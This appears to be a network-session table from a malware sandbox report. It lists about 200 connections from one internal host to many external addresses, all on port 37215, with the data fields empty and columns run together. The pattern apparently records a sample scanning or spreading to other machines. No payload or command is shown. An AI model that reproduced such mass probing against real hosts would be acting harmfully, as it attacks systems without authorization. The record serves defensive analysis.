                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18753192.168.2.155300641.242.212.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18754192.168.2.155750441.73.171.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18755192.168.2.155142641.214.134.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18756192.168.2.155537441.164.6.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18757192.168.2.154502041.242.65.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18758192.168.2.154535041.168.14.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18759192.168.2.154195841.249.114.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18760192.168.2.155483241.209.194.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18761192.168.2.155269041.58.163.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18762192.168.2.154644441.164.56.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18763192.168.2.155485841.16.197.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18764192.168.2.154330641.81.174.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18765192.168.2.155708641.66.195.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18766192.168.2.155025841.61.110.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18767192.168.2.154700241.59.241.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18768192.168.2.154378841.95.132.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18769192.168.2.154264441.148.145.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18770192.168.2.154660441.206.47.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18771192.168.2.153856041.24.26.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18772192.168.2.153807641.198.145.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18773192.168.2.154210641.243.80.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18774192.168.2.155527041.69.180.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18775192.168.2.155866441.3.235.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18776192.168.2.155475441.179.187.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18777192.168.2.154486841.153.26.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18778192.168.2.154348241.22.72.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18779192.168.2.153914441.206.105.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18780192.168.2.155226241.82.119.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18781192.168.2.154606241.190.248.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18782192.168.2.155466841.200.94.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18783192.168.2.154061041.125.168.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18784192.168.2.154337041.251.167.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18785192.168.2.154061041.8.230.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18786192.168.2.153690841.14.41.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18787192.168.2.153434641.208.227.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18788192.168.2.155651841.221.230.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18789192.168.2.155411041.204.168.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18790192.168.2.154106441.107.202.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18791192.168.2.154584441.103.216.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18792192.168.2.155993841.102.85.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18793192.168.2.155305241.115.230.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18794192.168.2.154557041.246.48.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18795192.168.2.153644841.113.252.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18796192.168.2.154722441.8.67.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18797192.168.2.153291041.167.33.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18798192.168.2.155450641.127.133.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18799192.168.2.154784241.158.228.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18800192.168.2.154690641.181.242.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18801192.168.2.154257441.185.231.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18802192.168.2.153711641.127.199.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18803192.168.2.154447041.125.195.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18804192.168.2.154092441.123.112.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18805192.168.2.155343441.157.79.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18806192.168.2.155932241.130.97.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18807192.168.2.155910641.200.189.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18808192.168.2.153539441.17.105.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18809192.168.2.155811241.170.101.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18810192.168.2.156047841.80.98.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18811192.168.2.155994441.57.236.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18812192.168.2.154640241.56.123.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18813192.168.2.155265041.100.171.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18814192.168.2.155257241.91.159.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18815192.168.2.155383041.25.40.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18816192.168.2.155601641.67.140.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18817192.168.2.155449041.60.156.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18818192.168.2.153979041.156.219.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18819192.168.2.154882241.141.18.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18820192.168.2.155360841.214.76.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18821192.168.2.155680641.113.69.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18822192.168.2.154872041.70.108.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18823192.168.2.153410841.206.32.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18824192.168.2.154570841.144.82.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18825192.168.2.155313041.252.155.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18826192.168.2.155994441.215.77.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18827192.168.2.155259641.196.46.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18828192.168.2.154425241.49.54.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18829192.168.2.153762841.139.111.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18830192.168.2.155581241.187.180.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18831192.168.2.154403441.138.204.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18832192.168.2.153554641.159.123.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18833192.168.2.154240841.141.121.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18834192.168.2.153981041.11.1.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18835192.168.2.156061041.216.102.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18836192.168.2.155334841.200.142.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18837192.168.2.156045441.56.26.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18838192.168.2.155874841.75.174.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18839192.168.2.155455041.3.52.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18840192.168.2.155349641.239.15.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18841192.168.2.154338241.141.69.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18842192.168.2.155180841.22.57.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18843192.168.2.154801041.80.234.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18844192.168.2.155062841.73.98.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18845192.168.2.155632441.55.123.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18846192.168.2.153983641.156.230.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18847192.168.2.156024841.5.56.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18848192.168.2.154525241.199.178.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18849192.168.2.154251841.36.89.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18850192.168.2.154732041.88.237.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18851192.168.2.155686841.6.55.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18852192.168.2.154065641.188.28.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18853192.168.2.155051241.60.253.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18854192.168.2.154209641.148.236.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18855192.168.2.155811441.231.151.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18856192.168.2.154797841.172.173.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18857192.168.2.155935441.239.140.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18858192.168.2.155188841.161.73.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18859192.168.2.155337641.244.0.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18860192.168.2.153725641.92.54.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18861192.168.2.154078641.131.48.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18862192.168.2.155116241.241.179.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18863192.168.2.155959441.68.235.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18864192.168.2.155169641.234.39.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18865192.168.2.154005441.12.119.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18866192.168.2.153842041.255.181.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18867192.168.2.155621041.58.94.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18868192.168.2.153291841.59.73.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18869192.168.2.153690641.213.84.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18870192.168.2.154888441.189.66.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18871192.168.2.154967441.0.43.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18872192.168.2.154595241.44.118.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18873192.168.2.154930041.35.239.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18874192.168.2.154693841.136.182.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18875192.168.2.154729641.39.103.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18876192.168.2.154259041.190.195.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18877192.168.2.155365041.177.246.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18878192.168.2.155152841.152.114.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18879192.168.2.155885241.39.161.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18880192.168.2.155546441.198.200.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18881192.168.2.155251841.240.188.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18882192.168.2.153466041.218.188.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18883192.168.2.154695441.86.72.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18884192.168.2.154836041.127.96.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18885192.168.2.153354841.66.195.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18886192.168.2.154091641.62.120.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18887192.168.2.154389841.104.162.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18888192.168.2.155895641.188.133.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18889192.168.2.155972241.159.11.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18890192.168.2.153676041.244.5.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18891192.168.2.155305441.0.99.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18892192.168.2.154303241.31.163.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18893192.168.2.154084441.248.191.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18894192.168.2.154551441.188.21.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18895192.168.2.154835641.216.29.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18896192.168.2.156039641.170.202.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18897192.168.2.153614841.121.110.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18898192.168.2.154915441.31.108.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18899192.168.2.1541636156.56.134.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18900192.168.2.1542076156.250.76.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18901192.168.2.1553944156.59.33.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18902192.168.2.1550088156.231.109.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18903192.168.2.1540536156.167.201.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18904192.168.2.1545324156.22.246.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18905192.168.2.1537380156.105.86.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18906192.168.2.1544560156.47.51.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18907192.168.2.1560868156.38.147.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18908192.168.2.1547612156.120.132.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18909192.168.2.1559058156.143.184.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18910192.168.2.1550730156.127.75.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18911192.168.2.1548360156.16.247.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18912192.168.2.1544342156.76.216.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18913192.168.2.1537952156.32.240.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18914192.168.2.1545690156.185.25.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18915192.168.2.1550470156.217.236.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18916192.168.2.1558152156.46.101.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18917192.168.2.1537242156.24.155.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18918192.168.2.1553990156.97.1.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18919192.168.2.1538580156.202.7.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18920192.168.2.1559100156.115.92.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18921192.168.2.1553622156.98.153.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18922192.168.2.1533472156.82.133.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18923192.168.2.1547386156.107.114.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18924192.168.2.1547304156.43.229.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18925192.168.2.1541704156.121.176.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18926192.168.2.1554216156.120.68.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18927192.168.2.1534532156.70.57.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18928192.168.2.1550138156.165.171.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18929192.168.2.1547032156.250.136.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18930192.168.2.1541242156.96.14.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18931192.168.2.1547604156.109.141.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18932192.168.2.1545396156.208.168.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18933192.168.2.1555380156.179.217.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18934192.168.2.1557400156.109.237.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18935192.168.2.1537386156.102.255.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18936192.168.2.1553570156.103.158.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18937192.168.2.1543630156.73.83.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18938192.168.2.1540588156.67.220.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18939192.168.2.1557628156.249.192.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18940192.168.2.1557900156.29.240.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18941192.168.2.1559094156.2.143.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18942192.168.2.1536208156.127.23.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18943192.168.2.1537338156.114.245.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18944192.168.2.1541048156.122.205.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18945192.168.2.1533418156.171.91.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18946192.168.2.1550074156.15.130.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18947192.168.2.1544356156.28.135.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18948192.168.2.1538378156.54.27.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18949192.168.2.1535152156.73.88.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18950192.168.2.1551136156.57.126.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18951192.168.2.1543790156.151.19.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18952192.168.2.1541512156.52.21.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18953192.168.2.1544754156.65.26.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18954192.168.2.1547624156.191.106.5237215
                                                                            TimestampBytes transferredDirectionData


